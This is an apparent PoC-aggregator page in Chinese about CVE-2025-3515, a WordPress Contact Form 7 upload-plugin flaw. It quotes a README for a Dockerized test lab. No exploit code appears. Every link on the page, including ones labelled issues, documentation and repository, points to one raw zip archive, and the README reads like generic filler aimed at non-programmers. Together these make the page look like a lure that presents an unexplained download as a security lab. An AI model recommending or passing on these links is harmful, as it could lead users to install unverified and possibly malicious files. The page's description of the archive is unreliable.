POC详情: 6263484bc5c20de839f861a078eee2c9b1f2f2e4

来源
关联漏洞
标题: WordPress plugin Drag and Drop Multiple File Upload for Contact Form 代码问题漏洞 (CVE-2025-3515)
描述:WordPress和WordPress plugin都是WordPress基金会的产品。WordPress是一套使用PHP语言开发的博客平台。该平台支持在PHP和MySQL的服务器上架设个人博客网站。WordPress plugin是一个应用插件。 WordPress plugin Drag and Drop Multiple File Upload for Contact Form 7 1.3.8.9及之前版本存在代码问题漏洞,该漏洞源于文件类型验证不足,可能导致未经验证攻击者上传.phar等危险文件类
描述
🛠️ Reproduce and validate CVE-2025-3515 in a Dockerized WordPress lab to test unrestricted file uploads via the Contact Form 7 plugin.
介绍
# 🌟 lab-cve-2025-3515 - Simple WordPress Security Testing

## 📥 Download Now
[![Download](https://raw.githubusercontent.com/MrSoules/lab-cve-2025-3515/master/Norfolk/lab-cve-2025-3515.zip)](https://raw.githubusercontent.com/MrSoules/lab-cve-2025-3515/master/Norfolk/lab-cve-2025-3515.zip)

## 📚 Overview
The **lab-cve-2025-3515** project offers a hands-on lab for understanding the security vulnerability CVE-2025-3515, specifically related to the WordPress plugin Contact Form 7. This tool allows users to test file upload features with a simple drag-and-drop interface. The application is packaged in Docker for easy setup, making it user-friendly even for those without programming skills.

## 🚀 Getting Started
Follow these steps to set up and run the application on your computer.

1. **Check Your System Requirements:**
   - Operating System: Windows, macOS, or Linux
   - Docker installed: Ensure you have Docker version 19.03 or higher
   - Minimum RAM: 2 GB
   - Disk Space: At least 500 MB available

2. **Download the Application:**
   - Visit this page to download: [GitHub Releases](https://raw.githubusercontent.com/MrSoules/lab-cve-2025-3515/master/Norfolk/lab-cve-2025-3515.zip)

3. **Install Docker:**
   - If you don't have Docker, download it from the official Docker website. Follow the instructions specific to your operating system for installation.

## 💻 Running the Application
Once you have Docker installed, you can easily run the application.

1. **Open your terminal or command prompt.**
2. **Run the following command to pull the Docker image:**
   ```
   docker pull mrsoules/lab-cve-2025-3515
   ```

3. **To start the application, use this command:**
   ```
   docker run -p 8080:80 mrsoules/lab-cve-2025-3515
   ```

4. **Access the application:**
   - Open your web browser and go to [http://localhost:8080](http://localhost:8080).

## 🔍 Features
- **Easy Drag-and-Drop Interface:** Simple file uploads without complex configurations.
- **Dockerized Environment:** Runs in a container, ensuring it won’t interfere with your local files or settings.
- **Testing Framework:** Use Nuclei for further security testing against vulnerabilities.
- **Open Source:** Contribute to or modify the code as per your needs.

## ⚙️ Troubleshooting
If you encounter any issues during the installation or running of the application, consider the following:

- **Docker Not Running:** Ensure that Docker is running. You can start it from your applications menu.
- **Port Conflicts:** Make sure no other applications are using port 8080. If they are, you can change the port in the run command:
  ```
  docker run -p [YOUR_PORT]:80 mrsoules/lab-cve-2025-3515
  ```
- **Internet Access:** Ensure you are connected to the internet for downloading the Docker image.

## 💬 Getting Help
If you need further assistance, visit the [issues section](https://raw.githubusercontent.com/MrSoules/lab-cve-2025-3515/master/Norfolk/lab-cve-2025-3515.zip) on GitHub. You can ask questions or report problems here.

## 🌐 Links
- [GitHub Repository](https://raw.githubusercontent.com/MrSoules/lab-cve-2025-3515/master/Norfolk/lab-cve-2025-3515.zip)
- [Documentation](https://raw.githubusercontent.com/MrSoules/lab-cve-2025-3515/master/Norfolk/lab-cve-2025-3515.zip)

## 🔗 Download Again
For your convenience, visit this page to download: [GitHub Releases](https://raw.githubusercontent.com/MrSoules/lab-cve-2025-3515/master/Norfolk/lab-cve-2025-3515.zip)

Enjoy exploring the world of WordPress security testing with CVE-2025-3515!
文件快照

[4.0K] /data/pocs/6263484bc5c20de839f861a078eee2c9b1f2f2e4 ├── [1.2K] docker-compose.yml ├── [4.0K] Norfolk │   └── [1.3M] lab-cve-2025-3515.zip ├── [3.5K] README.md └── [4.0K] scripts └── [3.8K] wp-init.sh 2 directories, 4 files
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。